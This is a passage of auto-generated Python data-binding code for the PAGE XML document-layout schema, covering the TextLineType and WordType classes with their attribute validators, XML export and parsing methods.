if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['left-to-right', 'right-to-left', 'top-to-bottom', 'bottom-to-top']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on ReadingDirectionSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def validate_ProductionSimpleType(self, value):
# Validate type pc:ProductionSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['printed', 'typewritten', 'handwritten-cursive', 'handwritten-printscript', 'medieval-manuscript', 'other']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on ProductionSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def hasContent_(self):
if (
self.AlternativeImage or
self.Coords is not None or
self.Baseline is not None or
self.Word or
self.TextEquiv or
self.TextStyle is not None or
self.UserDefined is not None or
self.Labels
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='TextLineType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('TextLineType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'TextLineType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='TextLineType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='TextLineType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='TextLineType'):
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.id), input_name='id')), ))
if self.primaryLanguage is not None and 'primaryLanguage' not in already_processed:
already_processed.add('primaryLanguage')
outfile.write(' primaryLanguage=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.primaryLanguage), input_name='primaryLanguage')), ))
if self.primaryScript is not None and 'primaryScript' not in already_processed:
already_processed.add('primaryScript')
outfile.write(' primaryScript=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.primaryScript), input_name='primaryScript')), ))
if self.secondaryScript is not None and 'secondaryScript' not in already_processed:
already_processed.add('secondaryScript')
outfile.write(' secondaryScript=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.secondaryScript), input_name='secondaryScript')), ))
if self.readingDirection is not None and 'readingDirection' not in already_processed:
already_processed.add('readingDirection')
outfile.write(' readingDirection=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.readingDirection), input_name='readingDirection')), ))
if self.production is not None and 'production' not in already_processed:
already_processed.add('production')
outfile.write(' production=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.production), input_name='production')), ))
if self.custom is not None and 'custom' not in already_processed:
already_processed.add('custom')
outfile.write(' custom=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.custom), input_name='custom')), ))
if self.comments is not None and 'comments' not in already_processed:
already_processed.add('comments')
outfile.write(' comments=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.comments), input_name='comments')), ))
if self.index is not None and 'index' not in already_processed:
already_processed.add('index')
outfile.write(' index="%s"' % self.gds_format_integer(self.index, input_name='index'))
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='TextLineType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for AlternativeImage_ in self.AlternativeImage:
namespaceprefix_ = self.AlternativeImage_nsprefix_ + ':' if (UseCapturedNS_ and self.AlternativeImage_nsprefix_) else ''
AlternativeImage_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='AlternativeImage', pretty_print=pretty_print)
if self.Coords is not None:
namespaceprefix_ = self.Coords_nsprefix_ + ':' if (UseCapturedNS_ and self.Coords_nsprefix_) else ''
self.Coords.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Coords', pretty_print=pretty_print)
if self.Baseline is not None:
namespaceprefix_ = self.Baseline_nsprefix_ + ':' if (UseCapturedNS_ and self.Baseline_nsprefix_) else ''
self.Baseline.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Baseline', pretty_print=pretty_print)
for Word_ in self.Word:
namespaceprefix_ = self.Word_nsprefix_ + ':' if (UseCapturedNS_ and self.Word_nsprefix_) else ''
Word_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Word', pretty_print=pretty_print)
for TextEquiv_ in self.TextEquiv:
namespaceprefix_ = self.TextEquiv_nsprefix_ + ':' if (UseCapturedNS_ and self.TextEquiv_nsprefix_) else ''
TextEquiv_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='TextEquiv', pretty_print=pretty_print)
if self.TextStyle is not None:
namespaceprefix_ = self.TextStyle_nsprefix_ + ':' if (UseCapturedNS_ and self.TextStyle_nsprefix_) else ''
self.TextStyle.export(outfile, level, namespaceprefix_, namespacedef_='', name_='TextStyle', pretty_print=pretty_print)
if self.UserDefined is not None:
namespaceprefix_ = self.UserDefined_nsprefix_ + ':' if (UseCapturedNS_ and self.UserDefined_nsprefix_) else ''
self.UserDefined.export(outfile, level, namespaceprefix_, namespacedef_='', name_='UserDefined', pretty_print=pretty_print)
for Labels_ in self.Labels:
namespaceprefix_ = self.Labels_nsprefix_ + ':' if (UseCapturedNS_ and self.Labels_nsprefix_) else ''
Labels_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Labels', pretty_print=pretty_print)
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('primaryLanguage', node)
if value is not None and 'primaryLanguage' not in already_processed:
already_processed.add('primaryLanguage')
self.primaryLanguage = value
self.validate_LanguageSimpleType(self.primaryLanguage) # validate type LanguageSimpleType
value = find_attr_value_('primaryScript', node)
if value is not None and 'primaryScript' not in already_processed:
already_processed.add('primaryScript')
self.primaryScript = value
self.validate_ScriptSimpleType(self.primaryScript) # validate type ScriptSimpleType
value = find_attr_value_('secondaryScript', node)
if value is not None and 'secondaryScript' not in already_processed:
already_processed.add('secondaryScript')
self.secondaryScript = value
self.validate_ScriptSimpleType(self.secondaryScript) # validate type ScriptSimpleType
value = find_attr_value_('readingDirection', node)
if value is not None and 'readingDirection' not in already_processed:
already_processed.add('readingDirection')
self.readingDirection = value
self.validate_ReadingDirectionSimpleType(self.readingDirection) # validate type ReadingDirectionSimpleType
value = find_attr_value_('production', node)
if value is not None and 'production' not in already_processed:
already_processed.add('production')
self.production = value
self.validate_ProductionSimpleType(self.production) # validate type ProductionSimpleType
value = find_attr_value_('custom', node)
if value is not None and 'custom' not in already_processed:
already_processed.add('custom')
self.custom = value
value = find_attr_value_('comments', node)
if value is not None and 'comments' not in already_processed:
already_processed.add('comments')
self.comments = value
value = find_attr_value_('index', node)
if value is not None and 'index' not in already_processed:
already_processed.add('index')
self.index = self.gds_parse_integer(value, node, 'index')
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
if nodeName_ == 'AlternativeImage':
obj_ = AlternativeImageType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.AlternativeImage.append(obj_)
obj_.original_tagname_ = 'AlternativeImage'
elif nodeName_ == 'Coords':
obj_ = CoordsType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.Coords = obj_
obj_.original_tagname_ = 'Coords'
elif nodeName_ == 'Baseline':
obj_ = BaselineType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.Baseline = obj_
obj_.original_tagname_ = 'Baseline'
elif nodeName_ == 'Word':
obj_ = WordType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.Word.append(obj_)
obj_.original_tagname_ = 'Word'
elif nodeName_ == 'TextEquiv':
obj_ = TextEquivType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.TextEquiv.append(obj_)
obj_.original_tagname_ = 'TextEquiv'
elif nodeName_ == 'TextStyle':
obj_ = TextStyleType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.TextStyle = obj_
obj_.original_tagname_ = 'TextStyle'
elif nodeName_ == 'UserDefined':
obj_ = UserDefinedType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.UserDefined = obj_
obj_.original_tagname_ = 'UserDefined'
elif nodeName_ == 'Labels':
obj_ = LabelsType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.Labels.append(obj_)
obj_.original_tagname_ = 'Labels'
def get_polygon(self):
'''
Get polygon from element which is parent of a Coords element
'''
points = [point for point in self.Coords.points.split(' ')]
return [[int(coord) for coord in point.split(',')] for point in points]
def get_polygon_string(self):
'''
Get polygon string from element which is parent of a Coords element
'''
return self.Coords.points.replace(' ', ',')
# end class TextLineType
class WordType(GeneratedsSuper):
"""Overrides primaryLanguage attribute of parent line
and/or text region
The primary script used in the word
The secondary script used in the word
The direction in which text within the word
should be read (order of characters).
Overrides the production attribute of the parent
text line and/or text region.
For generic use"""
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
MemberSpec_('id', 'string', 0, 0, {'use': 'required'}),
MemberSpec_('language', 'pc:LanguageSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('primaryScript', 'pc:ScriptSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('secondaryScript', 'pc:ScriptSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('readingDirection', 'pc:ReadingDirectionSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('production', 'pc:ProductionSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('custom', 'string', 0, 1, {'use': 'optional'}),
MemberSpec_('comments', 'string', 0, 1, {'use': 'optional'}),
MemberSpec_('AlternativeImage', 'AlternativeImageType', 1, 1, {'maxOccurs': 'unbounded', 'minOccurs': '0', 'name': 'AlternativeImage', 'type': 'AlternativeImageType'}, None),
MemberSpec_('Coords', 'CoordsType', 0, 0, {'name': 'Coords', 'type': 'CoordsType'}, None),
MemberSpec_('Glyph', 'GlyphType', 1, 1, {'maxOccurs': 'unbounded', 'minOccurs': '0', 'name': 'Glyph', 'type': 'GlyphType'}, None),
MemberSpec_('TextEquiv', 'TextEquivType', 1, 1, {'maxOccurs': 'unbounded', 'minOccurs': '0', 'name': 'TextEquiv', 'type': 'TextEquivType'}, None),
MemberSpec_('TextStyle', 'TextStyleType', 0, 1, {'minOccurs': '0', 'name': 'TextStyle', 'type': 'TextStyleType'}, None),
MemberSpec_('UserDefined', 'UserDefinedType', 0, 1, {'maxOccurs': '1', 'minOccurs': '0', 'name': 'UserDefined', 'type': 'UserDefinedType'}, None),
MemberSpec_('Labels', 'LabelsType', 1, 1, {'maxOccurs': 'unbounded', 'minOccurs': '0', 'name': 'Labels', 'type': 'LabelsType'}, None),
]
subclass = None
superclass = None
def __init__(self, id=None, language=None, primaryScript=None, secondaryScript=None, readingDirection=None, production=None, custom=None, comments=None, AlternativeImage=None, Coords=None, Glyph=None, TextEquiv=None, TextStyle=None, UserDefined=None, Labels=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = "pc"
self.id = _cast(None, id)
self.id_nsprefix_ = None
self.language = _cast(None, language)
self.language_nsprefix_ = None
self.primaryScript = _cast(None, primaryScript)
self.primaryScript_nsprefix_ = None
self.secondaryScript = _cast(None, secondaryScript)
self.secondaryScript_nsprefix_ = None
self.readingDirection = _cast(None, readingDirection)
self.readingDirection_nsprefix_ = None
self.production = _cast(None, production)
self.production_nsprefix_ = None
self.custom = _cast(None, custom)
self.custom_nsprefix_ = None
self.comments = _cast(None, comments)
self.comments_nsprefix_ = None
if AlternativeImage is None:
self.AlternativeImage = []
else:
self.AlternativeImage = AlternativeImage
self.AlternativeImage_nsprefix_ = "pc"
self.Coords = Coords
self.Coords_nsprefix_ = "pc"
if Glyph is None:
self.Glyph = []
else:
self.Glyph = Glyph
self.Glyph_nsprefix_ = "pc"
if TextEquiv is None:
self.TextEquiv = []
else:
self.TextEquiv = TextEquiv
self.TextEquiv_nsprefix_ = "pc"
self.TextStyle = TextStyle
self.TextStyle_nsprefix_ = "pc"
self.UserDefined = UserDefined
self.UserDefined_nsprefix_ = "pc"
if Labels is None:
self.Labels = []
else:
self.Labels = Labels
self.Labels_nsprefix_ = "pc"
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, WordType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if WordType.subclass:
return WordType.subclass(*args_, **kwargs_)
else:
return WordType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_AlternativeImage(self):
return self.AlternativeImage
def set_AlternativeImage(self, AlternativeImage):
self.AlternativeImage = AlternativeImage
def add_AlternativeImage(self, value):
self.AlternativeImage.append(value)
def insert_AlternativeImage_at(self, index, value):
self.AlternativeImage.insert(index, value)
def replace_AlternativeImage_at(self, index, value):
self.AlternativeImage[index] = value
def get_Coords(self):
return self.Coords
def set_Coords(self, Coords):
self.Coords = Coords
def get_Glyph(self):
return self.Glyph
def set_Glyph(self, Glyph):
self.Glyph = Glyph
def add_Glyph(self, value):
self.Glyph.append(value)
def insert_Glyph_at(self, index, value):
self.Glyph.insert(index, value)
def replace_Glyph_at(self, index, value):
self.Glyph[index] = value
def get_TextEquiv(self):
return self.TextEquiv
def set_TextEquiv(self, TextEquiv):
self.TextEquiv = TextEquiv
def add_TextEquiv(self, value):
self.TextEquiv.append(value)
def insert_TextEquiv_at(self, index, value):
self.TextEquiv.insert(index, value)
def replace_TextEquiv_at(self, index, value):
self.TextEquiv[index] = value
def get_TextStyle(self):
return self.TextStyle
def set_TextStyle(self, TextStyle):
self.TextStyle = TextStyle
def get_UserDefined(self):
return self.UserDefined
def set_UserDefined(self, UserDefined):
self.UserDefined = UserDefined
def get_Labels(self):
return self.Labels
def set_Labels(self, Labels):
self.Labels = Labels
def add_Labels(self, value):
self.Labels.append(value)
def insert_Labels_at(self, index, value):
self.Labels.insert(index, value)
def replace_Labels_at(self, index, value):
self.Labels[index] = value
def get_id(self):
return self.id
def set_id(self, id):
self.id = id
def get_language(self):
return self.language
def set_language(self, language):
self.language = language
def get_primaryScript(self):
return self.primaryScript
def set_primaryScript(self, primaryScript):
self.primaryScript = primaryScript
def get_secondaryScript(self):
return self.secondaryScript
def set_secondaryScript(self, secondaryScript):
self.secondaryScript = secondaryScript
def get_readingDirection(self):
return self.readingDirection
def set_readingDirection(self, readingDirection):
self.readingDirection = readingDirection
def get_production(self):
return self.production
def set_production(self, production):
self.production = production
def get_custom(self):
return self.custom
def set_custom(self, custom):
self.custom = custom
def get_comments(self):
return self.comments
def set_comments(self, comments):
self.comments = comments
def validate_LanguageSimpleType(self, value):
# Validate type pc:LanguageSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['Abkhaz', 'Afar', 'Afrikaans', 'Akan', 'Albanian', 'Amharic', 'Arabic', 'Aragonese', 'Armenian', 'Assamese', 'Avaric', 'Avestan', 'Aymara', 'Azerbaijani', 'Bambara', 'Bashkir', 'Basque', 'Belarusian', 'Bengali', 'Bihari', 'Bislama', 'Bosnian', 'Breton', 'Bulgarian', 'Burmese', 'Cambodian', 'Cantonese', 'Catalan', 'Chamorro', 'Chechen', 'Chichewa', 'Chinese', 'Chuvash', 'Cornish', 'Corsican', 'Cree', 'Croatian', 'Czech', 'Danish', 'Divehi', 'Dutch', 'Dzongkha', 'English', 'Esperanto', 'Estonian', 'Ewe', 'Faroese', 'Fijian', 'Finnish', 'French', 'Fula', 'Gaelic', 'Galician', 'Ganda', 'Georgian', 'German', 'Greek', 'Guaraní', 'Gujarati', 'Haitian', 'Hausa', 'Hebrew', 'Herero', 'Hindi', 'Hiri Motu', 'Hungarian', 'Icelandic', 'Ido', 'Igbo', 'Indonesian', 'Interlingua', 'Interlingue', 'Inuktitut', 'Inupiaq', 'Irish', 'Italian', 'Japanese', 'Javanese', 'Kalaallisut', 'Kannada', 'Kanuri', 'Kashmiri', 'Kazakh', 'Khmer', 'Kikuyu', 'Kinyarwanda', 'Kirundi', 'Komi', 'Kongo', 'Korean', 'Kurdish', 'Kwanyama', 'Kyrgyz', 'Lao', 'Latin', 'Latvian', 'Limburgish', 'Lingala', 'Lithuanian', 'Luba-Katanga', 'Luxembourgish', 'Macedonian', 'Malagasy', 'Malay', 'Malayalam', 'Maltese', 'Manx', 'Māori', 'Marathi', 'Marshallese', 'Mongolian', 'Nauru', 'Navajo', 'Ndonga', 'Nepali', 'North Ndebele', 'Northern Sami', 'Norwegian', 'Norwegian Bokmål', 'Norwegian Nynorsk', 'Nuosu', 'Occitan', 'Ojibwe', 'Old Church Slavonic', 'Oriya', 'Oromo', 'Ossetian', 'Pāli', 'Panjabi', 'Pashto', 'Persian', 'Polish', 'Portuguese', 'Punjabi', 'Quechua', 'Romanian', 'Romansh', 'Russian', 'Samoan', 'Sango', 'Sanskrit', 'Sardinian', 'Serbian', 'Shona', 'Sindhi', 'Sinhala', 'Slovak', 'Slovene', 'Somali', 'South Ndebele', 'Southern Sotho', 'Spanish', 'Sundanese', 'Swahili', 'Swati', 'Swedish', 'Tagalog', 'Tahitian', 'Tajik', 'Tamil', 'Tatar', 'Telugu', 'Thai', 'Tibetan', 'Tigrinya', 'Tonga', 'Tsonga', 'Tswana', 'Turkish', 'Turkmen', 'Twi', 'Uighur', 'Ukrainian', 'Urdu', 'Uzbek', 'Venda', 'Vietnamese', 'Volapük', 'Walloon', 'Welsh', 'Western Frisian', 'Wolof', 'Xhosa', 'Yiddish', 'Yoruba', 'Zhuang', 'Zulu', 'other']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on LanguageSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def validate_ScriptSimpleType(self, value):
# Validate type pc:ScriptSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['Adlm - Adlam', 'Afak - Afaka', 'Aghb - Caucasian Albanian', 'Ahom - Ahom, Tai Ahom', 'Arab - Arabic', 'Aran - Arabic (Nastaliq variant)', 'Armi - Imperial Aramaic', 'Armn - Armenian', 'Avst - Avestan', 'Bali - Balinese', 'Bamu - Bamum', 'Bass - Bassa Vah', 'Batk - Batak', 'Beng - Bengali', 'Bhks - Bhaiksuki', 'Blis - Blissymbols', 'Bopo - Bopomofo', 'Brah - Brahmi', 'Brai - Braille', 'Bugi - Buginese', 'Buhd - Buhid', 'Cakm - Chakma', 'Cans - Unified Canadian Aboriginal Syllabics', 'Cari - Carian', 'Cham - Cham', 'Cher - Cherokee', 'Cirt - Cirth', 'Copt - Coptic', 'Cprt - Cypriot', 'Cyrl - Cyrillic', 'Cyrs - Cyrillic (Old Church Slavonic variant)', 'Deva - Devanagari (Nagari)', 'Dsrt - Deseret (Mormon)', 'Dupl - Duployan shorthand, Duployan stenography', 'Egyd - Egyptian demotic', 'Egyh - Egyptian hieratic', 'Egyp - Egyptian hieroglyphs', 'Elba - Elbasan', 'Ethi - Ethiopic', 'Geok - Khutsuri (Asomtavruli and Nuskhuri)', 'Geor - Georgian (Mkhedruli)', 'Glag - Glagolitic', 'Goth - Gothic', 'Gran - Grantha', 'Grek - Greek', 'Gujr - Gujarati', 'Guru - Gurmukhi', 'Hanb - Han with Bopomofo', 'Hang - Hangul', 'Hani - Han (Hanzi, Kanji, Hanja)', 'Hano - Hanunoo (Hanunóo)', 'Hans - Han (Simplified variant)', 'Hant - Han (Traditional variant)', 'Hatr - Hatran', 'Hebr - Hebrew', 'Hira - Hiragana', 'Hluw - Anatolian Hieroglyphs', 'Hmng - Pahawh Hmong', 'Hrkt - Japanese syllabaries', 'Hung - Old Hungarian (Hungarian Runic)', 'Inds - Indus (Harappan)', 'Ital - Old Italic (Etruscan, Oscan etc.)', 'Jamo - Jamo', 'Java - Javanese', 'Jpan - Japanese', 'Jurc - Jurchen', 'Kali - Kayah Li', 'Kana - Katakana', 'Khar - Kharoshthi', 'Khmr - Khmer', 'Khoj - Khojki', 'Kitl - Khitan large script', 'Kits - Khitan small script', 'Knda - Kannada', 'Kore - Korean (alias for Hangul + Han)', 'Kpel - Kpelle', 'Kthi - Kaithi', 'Lana - Tai Tham (Lanna)', 'Laoo - Lao', 'Latf - Latin (Fraktur variant)', 'Latg - Latin (Gaelic variant)', 'Latn - Latin', 'Leke - Leke', 'Lepc - Lepcha (Róng)', 'Limb - Limbu', 'Lina - Linear A', 'Linb - Linear B', 'Lisu - Lisu (Fraser)', 'Loma - Loma', 'Lyci - Lycian', 'Lydi - Lydian', 'Mahj - Mahajani', 'Mand - Mandaic, Mandaean', 'Mani - Manichaean', 'Marc - Marchen', 'Maya - Mayan hieroglyphs', 'Mend - Mende Kikakui', 'Merc - Meroitic Cursive', 'Mero - Meroitic Hieroglyphs', 'Mlym - Malayalam', 'Modi - Modi, Moḍī', 'Mong - Mongolian', 'Moon - Moon (Moon code, Moon script, Moon type)', 'Mroo - Mro, Mru', 'Mtei - Meitei Mayek (Meithei, Meetei)', 'Mult - Multani', 'Mymr - Myanmar (Burmese)', 'Narb - Old North Arabian (Ancient North Arabian)', 'Nbat - Nabataean', 'Newa - Newa, Newar, Newari', 'Nkgb - Nakhi Geba', 'Nkoo - N’Ko', 'Nshu - Nüshu', 'Ogam - Ogham', 'Olck - Ol Chiki (Ol Cemet’, Ol, Santali)', 'Orkh - Old Turkic, Orkhon Runic', 'Orya - Oriya', 'Osge - Osage', 'Osma - Osmanya', 'Palm - Palmyrene', 'Pauc - Pau Cin Hau', 'Perm - Old Permic', 'Phag - Phags-pa', 'Phli - Inscriptional Pahlavi', 'Phlp - Psalter Pahlavi', 'Phlv - Book Pahlavi', 'Phnx - Phoenician', 'Piqd - Klingon (KLI pIqaD)', 'Plrd - Miao (Pollard)', 'Prti - Inscriptional Parthian', 'Rjng - Rejang (Redjang, Kaganga)', 'Roro - Rongorongo', 'Runr - Runic', 'Samr - Samaritan', 'Sara - Sarati', 'Sarb - Old South Arabian', 'Saur - Saurashtra', 'Sgnw - SignWriting', 'Shaw - Shavian (Shaw)', 'Shrd - Sharada, Śāradā', 'Sidd - Siddham', 'Sind - Khudawadi, Sindhi', 'Sinh - Sinhala', 'Sora - Sora Sompeng', 'Sund - Sundanese', 'Sylo - Syloti Nagri', 'Syrc - Syriac', 'Syre - Syriac (Estrangelo variant)', 'Syrj - Syriac (Western variant)', 'Syrn - Syriac (Eastern variant)', 'Tagb - Tagbanwa', 'Takr - Takri', 'Tale - Tai Le', 'Talu - New Tai Lue', 'Taml - Tamil', 'Tang - Tangut', 'Tavt - Tai Viet', 'Telu - Telugu', 'Teng - Tengwar', 'Tfng - Tifinagh (Berber)', 'Tglg - Tagalog (Baybayin, Alibata)', 'Thaa - Thaana', 'Thai - Thai', 'Tibt - Tibetan', 'Tirh - Tirhuta', 'Ugar - Ugaritic', 'Vaii - Vai', 'Visp - Visible Speech', 'Wara - Warang Citi (Varang Kshiti)', 'Wole - Woleai', 'Xpeo - Old Persian', 'Xsux - Cuneiform, Sumero-Akkadian', 'Yiii - Yi', 'Zinh - Code for inherited script', 'Zmth - Mathematical notation', 'Zsye - Symbols (Emoji variant)', 'Zsym - Symbols', 'Zxxx - Code for unwritten documents', 'Zyyy - Code for undetermined script', 'Zzzz - Code for uncoded script', 'other']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on ScriptSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def validate_ReadingDirectionSimpleType(self, value):
# Validate type pc:ReadingDirectionSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['left-to-right', 'right-to-left', 'top-to-bottom', 'bottom-to-top']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on ReadingDirectionSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def validate_ProductionSimpleType(self, value):
# Validate type pc:ProductionSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['printed', 'typewritten', 'handwritten-cursive', 'handwritten-printscript', 'medieval-manuscript', 'other']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on ProductionSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def hasContent_(self):
if (
self.AlternativeImage or
self.Coords is not None or
self.Glyph or
self.TextEquiv or
self.TextStyle is not None or
self.UserDefined is not None or
self.Labels
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='WordType', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('WordType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None and name_ == 'WordType':
name_ = self.original_tagname_
if UseCapturedNS_ and self.ns_prefix_:
namespaceprefix_ = self.ns_prefix_ + ':'
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='WordType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='WordType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='WordType'):
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.id), input_name='id')), ))
if self.language is not None and 'language' not in already_processed:
already_processed.add('language')
outfile.write(' language=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.language), input_name='language')), ))
if self.primaryScript is not None and 'primaryScript' not in already_processed:
already_processed.add('primaryScript')
outfile.write(' primaryScript=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.primaryScript), input_name='primaryScript')), ))
if self.secondaryScript is not None and 'secondaryScript' not in already_processed:
already_processed.add('secondaryScript')
outfile.write(' secondaryScript=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.secondaryScript), input_name='secondaryScript')), ))
if self.readingDirection is not None and 'readingDirection' not in already_processed:
already_processed.add('readingDirection')
outfile.write(' readingDirection=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.readingDirection), input_name='readingDirection')), ))
if self.production is not None and 'production' not in already_processed:
already_processed.add('production')
